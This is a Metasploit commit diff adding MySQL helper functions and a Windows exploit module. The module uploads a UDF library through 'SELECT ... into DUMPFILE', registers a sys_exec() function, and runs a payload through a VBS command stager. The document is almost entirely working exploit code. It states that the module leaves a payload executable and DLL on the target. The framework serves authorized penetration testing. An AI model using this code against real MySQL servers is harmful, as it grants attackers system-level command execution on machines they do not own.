Fixes #3916. Adds a module for mysql delivery of a payload via a UDF, using Bernardo's quite excellent UDF libraries.

git-svn-id: file:///home/svn/framework3/trunk@11899 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-08 22:42:26 +00:00 · 2011-03-08 22:42:26 +00:00 · 42531e097f
parent 54382c6080
commit 42531e097f
4 changed files with 231 additions and 1 deletions
--- a/data/exploits/lib_mysqludf_sys_32.dll
+++ b/data/exploits/lib_mysqludf_sys_32.dll
--- a/data/exploits/lib_mysqludf_sys_64.dll
+++ b/data/exploits/lib_mysqludf_sys_64.dll
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@ -66,10 +66,130 @@ module Exploit::Remote::MYSQL
 			print_error("MySQL Error: #{e.class} #{e.to_s}")
 			return
 		end
 		res
 	end
 	def mysql_get_plugin_dir
 		print_status "Checking for MySQL plugin directory..."
 		plugin_res = nil
 		base_res = nil
 		plugin_res = mysql_get_variable("@@plugin_dir") rescue nil
 		begin
 			res = mysql_query("show variables like 'basedir'") 
 			base_res = res.first[1] if res.respond_to? :first
 		rescue nil
 		end
 		if plugin_res.respond_to? :split
 			target_path = plugin_res.split(/[\x5c\x2f]+/).join("/") << "/"
 		elsif base_res.respond_to? :split
 			target_path = base_res.split(/[\x5c\x2f]+/).join("/") << "/bin/"
 		else
 			print_error "Cannot determine the plugin directory."
 			return false
 		end
 	end
 	def mysql_get_temp_dir
 		print_status "Checking for temp directory..."
 		res = mysql_get_variable("@@tmpdir")
 		if res.respond_to? :split
 			target_path = res.split(/[\x5c\x2f]+/).join("/") << "/"
 		else
 			print_error "Cannot determine the temp directory, exiting."
 			return false
 		end
 	end
 	def mysql_get_variable(var)
 		res = mysql_query("SELECT #{var}")
 		if res.respond_to? :first
 			return res.first.first
 		end
 	end
 	def mysql_upload_binary(bindata)
 		blob = "0x"
 		blob << bindata.unpack("C*").map {|x| "%02x" % [x]}.join
 		tmpdir = mysql_get_temp_dir
 		binname = Rex::Text.rand_text_alpha(8)
 		binpath = tmpdir << binname
 		print_status "Uploading binary as #{binpath}..."
 		res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
 		return res
 	end
 	def mysql_upload_sys_udf(arch=:win32,target_path=nil)
 		fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
 		sys_dll = File.join( Msf::Config.install_root, "data", "exploits", fname )
 		data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
 		blob = "0x"
 		blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
 		dll_name = Rex::Text.rand_text_alpha(8)
 		target_dll = target_path << dll_name << ".dll"
 		print_status "Uploading #{fname} library to #{target_dll}..."
 		mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
 		return dll_name << ".dll"
 	end
 	def mysql_drop_and_create_sys_exec(soname)
 		mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
 		mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
 		return true
 	end
 	def mysql_get_arch
 		print_status "Checking target architecture..."
 		res = mysql_get_variable("@@version_compile_os")
 		return :unknown unless res
 		case res
 		when /Win64/i
 			:win64
 		when /Win32/i
 			:win32
 		else
 			res
 		end
 	end
 	def mysql_add_sys_exec
 		arch = mysql_get_arch
 		case arch
 		when :win64,:win32
 			target_path = mysql_get_plugin_dir
 			if target_path
 				print_status "Target arch (#{arch}) and target path both okay."
 				soname = mysql_upload_sys_udf(arch,target_path) 
 				mysql_drop_and_create_sys_exec(soname)
 				return true
 			else 
 				print_status "Cannot determine an appropriate target path."
 				false
 			end
 		when :unknown
 			print_error "Cannot determine target's architecture"
 			return false
 		else
 			print_error "Target is an incompatible architecture: #{res}"
 			return false
 		end
 	end
 	def mysql_check_for_sys_exec
 		print_status "Checking for sys_exec()..."
 		res = mysql_query("select * from mysql.func where name = 'sys_exec'")
 		res.size == 1
 	end
 	def mysql_sys_exec(cmd,doprint=false,opts={})
 		res = mysql_query("select sys_exec('#{cmd}')")
 		if res && doprint
 			print_status "Executing: #{cmd}" 
 			return res
 		end
 	end
 end
 end
--- a/modules/exploits/windows/mysql/mysql_payload.rb
+++ b/modules/exploits/windows/mysql/mysql_payload.rb
@ -0,0 +1,110 @@
 ##
 # $Id$
 ##
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 	include Msf::Exploit::Remote::MYSQL
 	include Msf::Exploit::CmdStagerVBS
 	def initialize(info = {})
 		super(
 			update_info(
 				info,
 			'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
 			'Description'    => %q{
 				This module creates and enables a custom UDF (user defined function) on the
 				target host via the SELECT ... into DUMPFILE method of binary injection. On
 				default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
 				permissions not enforced, and the MySQL service runs as LocalSystem.
 				NOTE: This module will leave a payload executable on the target system when the
 				attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
 				and sys_exec() functions.
 			},
 		'Author'         =>
 		[
 			'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
 			'todb' # this Metasploit module
 		],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
 		[
 			# Bernardo's work with cmd exec via udf
 			[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
 			# Advice from 2005 on securing MySQL on Windows, kind of helpful.
 			[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
 		],
 			'Platform'       => 'win',
 			'Targets'        =>
 		[
 			[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
 		],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
 		))
 		register_options(
 			[
 				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
 				OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
 				OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
 		])
 	end
 	def username
 		datastore['USERNAME']
 	end
 	def password
 		datastore['PASSWORD']
 	end
 	def login_and_get_sys_exec
 		mysql_login(username,password,'mysql')
 		@mysql_arch = mysql_get_arch
 		@mysql_sys_exec_available = mysql_check_for_sys_exec() 
 		if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
 			mysql_add_sys_exec 
 			@mysql_sys_exec_available = mysql_check_for_sys_exec() 
 		else
 			print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
 		end
 	end
 	def execute_command(cmd, opts)
 		mysql_sys_exec(cmd, datastore['VERBOSE'])
 	end
 	def exploit
 		login_and_get_sys_exec()
 		if not @mysql_handle
 			print_status("Invalid MySQL credentials")
 			return
 		elsif not [:win32,:win64].include?(@mysql_arch) 
 			print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
 			return
 		else
 			if @mysql_sys_exec_available
 				execute_cmdstager({:linemax => 1500, :nodelete => true})
 				handler
 			else
 				print_status("MySQL function sys_exec() not available")
 				return
 			end
 		end
 		disconnect
 	end
 end